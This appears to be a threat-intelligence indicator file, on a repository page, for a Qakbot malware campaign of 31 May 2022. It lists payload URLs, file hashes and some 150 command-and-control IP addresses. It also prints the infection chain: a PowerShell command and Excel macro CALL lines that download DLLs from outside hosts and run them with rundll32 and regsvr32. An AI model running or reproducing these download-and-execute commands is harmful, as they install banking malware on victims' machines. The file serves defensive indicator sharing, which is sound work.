-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_31.05.2022.txt
206 lines (183 loc) · 4.97 KB
/
Qakbot_AA_31.05.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
31.05.2022 | Qakbot | AA | Campaign 1653985220 | Version 403.688
*************************************************
.url https://nkic.edu.np/itet/aeuqutt (.xlsb)
.url http://evoluicursos.com/ee/qiedsua (.lnk)
.url HTTPS://projetomemoravel.com/hQfHMUFZg/FF.png
.url HTTPS://apsosyal.com/8Hg65CnSrJd4/FF.png
.url HTTPS://igitplacements.ac.in/olmkmS4I/FF.png
.zip c14971d5e3ab98b929e40cc493462b120fadbfd21893f6d5819f3281ebb05c9b (lnk)
.xls f1dc179d7a3aeb57b86d939b5b4d116b3b7778f9ac79b11d1c2e5a410436effa
.dll 1176381ebfc60acd5078c5a6ac4ac5a0defffce6f1a6c1f6fbe830dd2df6c3e6
.dll bde66b4246cfbb415549464b424ffd581885dc8a2b85cb2d2676ead4d66b64e8
.dll c9c0e45015785baff7f64720ba9c3ec85e70506cf78a6e25e8f11bc6949aadbb
*************************************************
Exec >>
cmd /c C:\Users\Admin\AppData\Local\Temp\form5.6.2021.lnk
powershell.exe -NoE iwr -Uri https://projetomemoravel.com/hQfHMUFZg/FF.png -OutFile $env:TEMP\hjghu.dll;saps rundll32.exe $env:TEMP\hjghu.dll,DllRegisterServer
rundll32.exe" C:\Users\Admin\AppData\Local\Temp\hjghu.dll DllRegisterServer
*************************************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Vrhgdast", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Vrhgdast\Tfujist", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://projetomemoravel.com/hQfHMUFZg/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor.ooooccccxxxxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://apsosyal.com/8Hg65CnSrJd4/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor1.ooooccccxxxxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://igitplacements.ac.in/olmkmS4I/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor2.ooooccccxxxxx")
*************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\593ddfe9dfe7fb77c416ba293e3e3f7a04a7df4fb102bde52ca151eda7f71820.xlsb
Regsvr32 /s calc
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor.ooooccccxxxxx
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor1.ooooccccxxxxx
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor2.ooooccccxxxxx
*************************************************
*************************************************
c2's
175.145.235.37:443
148.0.61.36:443
217.165.97.52:993
121.7.223.45:2222
47.23.89.60:993
84.241.8.23:32103
39.44.66.76:995
217.164.118.38:2222
89.211.179.247:2222
74.14.5.179:2222
86.195.158.178:2222
39.52.80.230:995
67.165.206.193:993
5.32.41.45:443
1.161.123.180:443
217.165.176.49:2222
124.40.244.115:2222
37.34.253.233:443
82.152.39.39:443
37.186.54.254:995
186.90.153.162:2222
120.150.218.241:995
41.86.42.158:995
117.248.109.38:21
182.191.92.203:995
91.177.173.10:995
187.207.131.50:61202
217.128.122.65:2222
32.221.224.140:995
70.46.220.114:443
24.178.196.158:2222
45.241.169.86:993
39.49.111.194:995
140.82.63.183:995
144.202.3.39:443
144.202.2.175:995
45.76.167.26:995
45.63.1.12:995
144.202.3.39:995
45.63.1.12:443
144.202.2.175:443
140.82.63.183:443
149.28.238.199:995
45.76.167.26:443
149.28.238.199:443
173.174.216.62:443
24.139.72.117:443
89.86.33.217:443
80.11.74.81:2222
217.164.118.38:1194
140.82.49.12:443
176.67.56.94:443
108.60.213.141:443
93.48.80.198:995
76.70.9.169:2222
67.209.195.198:443
92.132.172.197:2222
148.64.96.100:443
202.134.152.2:2222
39.44.106.187:995
75.99.168.194:61201
47.156.131.10:443
69.14.172.24:443
1.161.123.180:995
174.69.215.101:443
85.246.82.244:443
173.21.10.71:2222
76.25.142.196:443
210.246.4.69:995
39.41.225.204:995
73.151.236.31:443
45.46.53.140:2222
208.107.221.224:443
189.223.134.157:443
187.208.127.127:443
72.252.157.93:990
70.51.135.90:2222
102.182.232.3:995
189.203.103.147:22
72.252.157.93:993
187.16.64.193:2222
41.38.167.179:995
177.139.44.173:32101
90.120.65.153:2078
24.55.67.176:443
109.12.111.14:443
72.252.157.93:995
179.158.105.44:443
201.172.23.68:2222
41.84.233.25:995
196.203.37.215:80
191.112.1.69:443
31.48.174.63:2078
177.205.155.85:443
2.50.137.23:443
79.129.121.68:995
197.83.230.112:443
179.100.20.32:32101
106.51.48.170:50001
86.97.9.190:443
41.84.240.230:443
172.115.177.204:2222
46.198.231.232:995
111.125.245.116:995
96.37.113.36:993
124.109.35.32:995
78.100.210.132:6883
201.242.175.29:2222
47.157.227.70:443
190.252.242.69:443
63.143.92.99:995
40.134.246.185:995
38.70.253.226:2222
100.1.108.246:443
78.169.246.124:443
125.24.105.160:443
177.133.210.218:443
180.129.108.214:995
82.41.63.217:443
189.146.87.77:443
187.172.146.147:443
217.165.79.88:443
85.255.234.203:443
94.36.191.129:2222
103.246.242.202:443
197.92.129.0:443
41.230.62.211:995
72.27.86.98:443
31.35.28.29:443
67.69.166.79:2222
180.127.90.0:2222
79.80.80.29:2222
172.114.160.81:995
94.26.122.9:995
75.99.168.194:443
189.253.206.105:443
81.215.196.174:443
46.107.48.202:443
59.93.93.37:443
2.34.12.8:443
181.208.248.227:443
103.116.178.85:995
41.228.22.180:443
120.61.2.124:443
89.137.52.44:443
72.66.116.235:995
125.168.47.127:2222
72.76.94.99:443
103.107.113.83:443
113.89.6.31:995